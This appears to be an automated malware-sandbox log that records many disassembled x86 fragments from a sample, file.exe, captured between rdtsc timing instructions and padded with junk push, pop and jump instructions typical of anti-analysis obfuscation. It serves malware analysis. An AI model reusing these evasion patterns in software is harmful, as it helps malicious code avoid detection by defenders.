Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20795 second address: 4E20799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2081B second address: 4E20863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8854FAEB92h 0x00000009 adc si, FBE8h 0x0000000e jmp 00007F8854FAEB8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 cmp dword ptr [ebp-04h], 00000000h 0x0000001b pushad 0x0000001c jmp 00007F8854FAEB94h 0x00000021 push eax 0x00000022 push edx 0x00000023 movzx esi, di 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20863 second address: 4E20895 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8854FD885Dh 0x00000008 xor cx, B8B6h 0x0000000d jmp 00007F8854FD8861h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov esi, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20895 second address: 4E2089B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2089B second address: 4E208FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8854FD8860h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F8854FD885Bh 0x0000000f add cx, C69Eh 0x00000014 jmp 00007F8854FD8869h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F8854FD88AEh 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8854FD8866h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20926 second address: 4E2092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2092A second address: 4E20930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20930 second address: 4E2096A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7C22C6BEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 pop esi 0x00000015 jmp 00007F8854FAEB96h 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8854FAEB8Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2096A second address: 4E2096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2096E second address: 4E20974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20974 second address: 4E2006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F8854FD8857h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F88591500EDh 0x00000032 mov edi, edi 0x00000034 jmp 00007F8854FD8862h 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F8854FD8860h 0x0000003f push eax 0x00000040 jmp 00007F8854FD885Bh 0x00000045 xchg eax, ebp 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F8854FD8864h 0x0000004d jmp 00007F8854FD8865h 0x00000052 popfd 0x00000053 push esi 0x00000054 mov si, di 0x00000057 pop edx 0x00000058 popad 0x00000059 mov ebp, esp 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 mov eax, edx 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2006E second address: 4E20074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20074 second address: 4E20078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20078 second address: 4E200AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d jmp 00007F8854FAEB90h 0x00000012 push 10D27CEDh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200AF second address: 4E200B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200B5 second address: 4E200C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E200C9 second address: 4E20175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 65C8215Bh 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007F8854FD885Bh 0x00000019 pop eax 0x0000001a mov bh, D5h 0x0000001c popad 0x0000001d call 00007F8854FD8859h 0x00000022 pushad 0x00000023 mov ecx, 72FF7CCDh 0x00000028 pushfd 0x00000029 jmp 00007F8854FD885Ah 0x0000002e and esi, 3EB809E8h 0x00000034 jmp 00007F8854FD885Bh 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F8854FD885Fh 0x00000043 xor si, 792Eh 0x00000048 jmp 00007F8854FD8869h 0x0000004d popfd 0x0000004e movzx esi, bx 0x00000051 popad 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007F8854FD885Ah 0x0000005b mov eax, dword ptr [eax] 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F8854FD885Dh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20175 second address: 4E2017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2017B second address: 4E201E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov cl, B7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F8854FD8860h 0x00000013 pop eax 0x00000014 jmp 00007F8854FD8860h 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F8854FD8869h 0x0000002a sbb ah, FFFFFF86h 0x0000002d jmp 00007F8854FD8861h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201E5 second address: 4E201EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201EB second address: 4E201EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201EF second address: 4E201F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E201F3 second address: 4E2023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8854FD8864h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F8854FD8860h 0x00000016 sub esp, 18h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8854FD8867h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2023F second address: 4E20244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20244 second address: 4E202B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8854FD8865h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f call 00007F8854FD885Ah 0x00000014 mov bl, cl 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pushfd 0x00000019 jmp 00007F8854FD8863h 0x0000001e add ecx, 23DB518Eh 0x00000024 jmp 00007F8854FD8869h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov dword ptr [esp], ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dl, cl 0x00000034 movsx ebx, cx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202B3 second address: 4E202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202B9 second address: 4E202BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E202BD second address: 4E2034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d push ebx 0x0000000e mov edx, esi 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], esi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8854FAEB91h 0x0000001c sub eax, 45D605D6h 0x00000022 jmp 00007F8854FAEB91h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F8854FAEB90h 0x0000002e adc esi, 22D243F8h 0x00000034 jmp 00007F8854FAEB8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, edi 0x0000003c jmp 00007F8854FAEB96h 0x00000041 push eax 0x00000042 jmp 00007F8854FAEB8Bh 0x00000047 xchg eax, edi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov si, bx 0x0000004e mov si, dx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2034F second address: 4E203BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8866h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [769B4538h] 0x00000013 pushad 0x00000014 call 00007F8854FD885Ah 0x00000019 movzx ecx, dx 0x0000001c pop ebx 0x0000001d pushfd 0x0000001e jmp 00007F8854FD885Ch 0x00000023 sub esi, 25A54248h 0x00000029 jmp 00007F8854FD885Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xor dword ptr [ebp-08h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8854FD8865h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E203BC second address: 4E203CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E203CC second address: 4E2040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e jmp 00007F8854FD8865h 0x00000013 mov si, 4977h 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007F8854FD885Ah 0x0000001e push eax 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2040A second address: 4E20472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F8854FAEB93h 0x0000000b adc ecx, 2474A4AEh 0x00000011 jmp 00007F8854FAEB99h 0x00000016 popfd 0x00000017 popad 0x00000018 nop 0x00000019 jmp 00007F8854FAEB8Eh 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 jmp 00007F8854FAEB90h 0x00000026 mov dword ptr fs:[00000000h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20472 second address: 4E2048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10209 second address: 4E10212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 7C0Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10212 second address: 4E10303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8862h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FD8860h 0x00000010 sub esp, 2Ch 0x00000013 jmp 00007F8854FD8860h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F8854FD8860h 0x0000001e push eax 0x0000001f jmp 00007F8854FD885Bh 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F8854FD8866h 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c push esi 0x0000002d call 00007F8854FD885Dh 0x00000032 pop esi 0x00000033 pop ebx 0x00000034 call 00007F8854FD885Eh 0x00000039 mov ch, 11h 0x0000003b pop edx 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F8854FD885Dh 0x00000043 xchg eax, edi 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F8854FD885Ch 0x0000004b adc esi, 737CF0D8h 0x00000051 jmp 00007F8854FD885Bh 0x00000056 popfd 0x00000057 push eax 0x00000058 push edx 0x00000059 pushfd 0x0000005a jmp 00007F8854FD8866h 0x0000005f jmp 00007F8854FD8865h 0x00000064 popfd 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1031A second address: 4E10320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10320 second address: 4E1036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007F8854FD8862h 0x00000012 sub edi, edi 0x00000014 jmp 00007F8854FD8861h 0x00000019 inc ebx 0x0000001a jmp 00007F8854FD885Eh 0x0000001f test al, al 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, FC70h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1036B second address: 4E1037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1037F second address: 4E10393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8854FD8A23h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10393 second address: 4E10397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10397 second address: 4E1039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10446 second address: 4E10462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FAEB97h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104AA second address: 4E104AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104AE second address: 4E104B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104B4 second address: 4E104E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8864h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F88C6B26816h 0x0000000f pushad 0x00000010 call 00007F8854FD885Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104E3 second address: 4E104FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 mov di, si 0x00000009 pop ecx 0x0000000a popad 0x0000000b js 00007F8854FAEBECh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104FA second address: 4E104FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E104FE second address: 4E10504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10504 second address: 4E10548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov ebx, 5908FC78h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 jmp 00007F8854FD8867h 0x00000015 jne 00007F88C6B267C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8854FD8865h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10548 second address: 4E1054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1054E second address: 4E10552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10552 second address: 4E105EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d mov bx, si 0x00000010 pop eax 0x00000011 mov ah, bh 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp-2Ch] 0x00000017 jmp 00007F8854FAEB94h 0x0000001c xchg eax, esi 0x0000001d jmp 00007F8854FAEB90h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F8854FAEB8Fh 0x0000002e nop 0x0000002f jmp 00007F8854FAEB96h 0x00000034 push eax 0x00000035 jmp 00007F8854FAEB8Bh 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushfd 0x0000003f jmp 00007F8854FAEB92h 0x00000044 adc si, EAB8h 0x00000049 jmp 00007F8854FAEB8Bh 0x0000004e popfd 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E105EF second address: 4E10662 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8854FD8868h 0x00000008 sbb esi, 68112518h 0x0000000e jmp 00007F8854FD885Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F8854FD8868h 0x0000001b mov dx, ax 0x0000001e pop eax 0x0000001f popad 0x00000020 push ecx 0x00000021 jmp 00007F8854FD885Ah 0x00000026 mov dword ptr [esp], ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8854FD8867h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10010 second address: 4E10016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10016 second address: 4E10041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F8854FD885Ah 0x0000000b xor si, 4618h 0x00000010 jmp 00007F8854FD885Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10041 second address: 4E10047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10047 second address: 4E10092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8854FD885Ch 0x00000013 add esi, 620D27A8h 0x00000019 jmp 00007F8854FD885Bh 0x0000001e popfd 0x0000001f call 00007F8854FD8868h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10092 second address: 4E100AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB97h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100AD second address: 4E100D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FD8867h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100D1 second address: 4E100EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E100EE second address: 4E1012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FD885Eh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8854FD8867h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10AC3 second address: 4E10B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F8854FAEB8Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8854FAEB97h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10B04 second address: 4E10B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8864h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10B1C second address: 4E10B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 mov dx, A7F0h 0x00000014 mov bx, 531Ch 0x00000018 popad 0x00000019 je 00007F88C6AECA50h 0x0000001f pushad 0x00000020 jmp 00007F8854FAEB91h 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, AA8Bh 0x00000031 mov ah, 64h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E72 second address: 4E10E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E76 second address: 4E10E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10E7A second address: 4E10E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20997 second address: 4E2099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2099D second address: 4E209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E209A1 second address: 4E209E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 pushfd 0x00000012 jmp 00007F8854FAEB96h 0x00000017 and cx, 1608h 0x0000001c jmp 00007F8854FAEB8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
